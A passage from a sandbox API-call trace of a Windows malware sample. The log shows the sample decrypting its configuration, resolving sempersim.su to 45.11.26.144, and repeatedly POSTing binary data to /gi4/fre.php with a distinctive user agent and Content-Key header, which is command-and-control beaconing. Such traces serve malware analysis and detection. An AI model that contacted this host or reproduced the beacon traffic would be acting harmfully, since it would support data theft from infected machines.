Flags=0x0, Size=0x40) returned 0x5d3590 [0180.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.081] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0180.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.092] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0180.106] GetProcessHeap () returned 0x5b0000 [0180.106] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0180.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.107] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0180.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.115] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0180.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.116] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.116] GetProcessHeap () returned 0x5b0000 [0180.117] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0180.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.118] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0180.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.120] CryptDestroyKey (hKey=0x5bde08) returned 1 [0180.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.121] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0180.121] GetProcessHeap () returned 0x5b0000 [0180.121] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0180.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.122] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.123] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.128] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.130] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.130] GetProcessHeap () returned 0x5b0000 [0180.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0180.130] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0180.131] GetProcessHeap () returned 0x5b0000 [0180.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0180.132] GetProcessHeap () returned 0x5b0000 [0180.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0180.132] GetProcessHeap () returned 0x5b0000 [0180.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0180.132] GetProcessHeap () returned 0x5b0000 [0180.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0180.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.133] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0180.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.143] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0180.151] GetProcessHeap () returned 0x5b0000 [0180.151] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0180.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.152] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0180.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.153] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0180.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.154] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.154] GetProcessHeap () returned 0x5b0000 [0180.155] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0180.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.159] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0180.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.160] CryptDestroyKey (hKey=0x5bde08) returned 1 [0180.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0180.161] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0180.161] GetProcessHeap () returned 0x5b0000 [0180.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0180.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.163] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0180.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.164] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0180.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0180.164] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0180.164] GetProcessHeap () returned 0x5b0000 [0180.165] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0180.165] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0180.171] GetProcessHeap () returned 0x5b0000 [0180.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0180.171] socket (af=2, type=1, protocol=6) returned 0x2d4 [0180.171] connect (s=0x2d4, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0180.241] FreeAddrInfoW (pAddrInfo=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0180.241] GetProcessHeap () returned 0x5b0000 [0180.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0180.241] GetProcessHeap () returned 0x5b0000 [0180.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0180.241] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0180.242] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0180.242] GetProcessHeap () returned 0x5b0000 [0180.242] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0180.242] GetProcessHeap () returned 0x5b0000 [0180.243] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0180.243] GetProcessHeap () returned 0x5b0000 [0180.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3398 [0180.243] GetProcessHeap () returned 0x5b0000 [0180.243] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0180.243] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0180.244] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0180.244] GetProcessHeap () returned 0x5b0000 [0180.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0180.244] GetProcessHeap () returned 0x5b0000 [0180.245] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0180.245] send (s=0x2d4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0180.245] send (s=0x2d4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0180.245] GetProcessHeap () returned 0x5b0000 [0180.245] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0180.245] recv (in: s=0x2d4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0181.556] GetProcessHeap () returned 0x5b0000 [0181.557] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0181.557] GetProcessHeap () returned 0x5b0000 [0181.558] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0181.558] GetProcessHeap () returned 0x5b0000 [0181.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0181.559] GetProcessHeap () returned 0x5b0000 [0181.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0181.559] closesocket (s=0x2d4) returned 0 [0181.561] GetProcessHeap () returned 0x5b0000 [0181.561] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0181.561] GetProcessHeap () returned 0x5b0000 [0181.561] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0181.562] GetProcessHeap () returned 0x5b0000 [0181.563] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0181.563] GetProcessHeap () returned 0x5b0000 [0181.563] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0181.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1198) returned 0x2d4 [0181.576] Sleep (dwMilliseconds=0xea60) [0181.736] GetProcessHeap () returned 0x5b0000 [0181.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0181.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.737] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0181.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.746] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0181.761] GetProcessHeap () returned 0x5b0000 [0181.761] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0181.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.762] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0181.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.763] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0181.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.764] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.764] GetProcessHeap () returned 0x5b0000 [0181.765] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0181.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.767] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0181.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.768] CryptDestroyKey (hKey=0x5bde08) returned 1 [0181.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.769] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0181.769] GetProcessHeap () returned 0x5b0000 [0181.769] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0181.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.770] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.770] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.771] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.772] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.772] GetProcessHeap () returned 0x5b0000 [0181.772] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0181.772] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0181.772] GetProcessHeap () returned 0x5b0000 [0181.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0181.773] GetProcessHeap () returned 0x5b0000 [0181.773] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0181.773] GetProcessHeap () returned 0x5b0000 [0181.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0181.774] GetProcessHeap () returned 0x5b0000 [0181.774] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0181.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.775] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0181.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.783] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0181.791] GetProcessHeap () returned 0x5b0000 [0181.791] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0181.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.792] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0181.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.793] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0181.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.794] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.794] GetProcessHeap () returned 0x5b0000 [0181.794] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0181.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.795] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0181.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.797] CryptDestroyKey (hKey=0x5be288) returned 1 [0181.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0181.799] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0181.799] GetProcessHeap () returned 0x5b0000 [0181.799] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0181.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.800] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0181.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.801] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0181.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0181.802] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0181.802] GetProcessHeap () returned 0x5b0000 [0181.802] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0181.802] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0181.805] GetProcessHeap () returned 0x5b0000 [0181.805] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0181.805] socket (af=2, type=1, protocol=6) returned 0x2d8 [0181.805] connect (s=0x2d8, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0181.879] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0181.879] GetProcessHeap () returned 0x5b0000 [0181.879] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0181.879] GetProcessHeap () returned 0x5b0000 [0181.879] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0181.879] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0181.880] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0181.880] GetProcessHeap () returned 0x5b0000 [0181.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0181.880] GetProcessHeap () returned 0x5b0000 [0181.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0181.881] GetProcessHeap () returned 0x5b0000 [0181.881] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d33e0 [0181.881] GetProcessHeap () returned 0x5b0000 [0181.881] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0181.882] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0181.882] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0181.882] GetProcessHeap () returned 0x5b0000 [0181.882] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0181.882] GetProcessHeap () returned 0x5b0000 [0181.883] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0181.883] send (s=0x2d8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0181.884] send (s=0x2d8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0181.884] GetProcessHeap () returned 0x5b0000 [0181.884] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0181.884] recv (in: s=0x2d8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0183.486] GetProcessHeap () returned 0x5b0000 [0183.487] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0183.487] GetProcessHeap () returned 0x5b0000 [0183.487] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0183.487] GetProcessHeap () returned 0x5b0000 [0183.487] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0183.487] GetProcessHeap () returned 0x5b0000 [0183.488] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0183.488] closesocket (s=0x2d8) returned 0 [0183.489] GetProcessHeap () returned 0x5b0000 [0183.489] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0183.489] GetProcessHeap () returned 0x5b0000 [0183.489] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0183.489] GetProcessHeap () returned 0x5b0000 [0183.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0183.490] GetProcessHeap () returned 0x5b0000 [0183.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0183.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x11e4) returned 0x2d8 [0183.493] Sleep (dwMilliseconds=0xea60) [0183.504] GetProcessHeap () returned 0x5b0000 [0183.504] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0183.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.505] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0183.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.514] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0183.526] GetProcessHeap () returned 0x5b0000 [0183.526] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0183.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0183.527] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8620, dwDataLen=0x24, 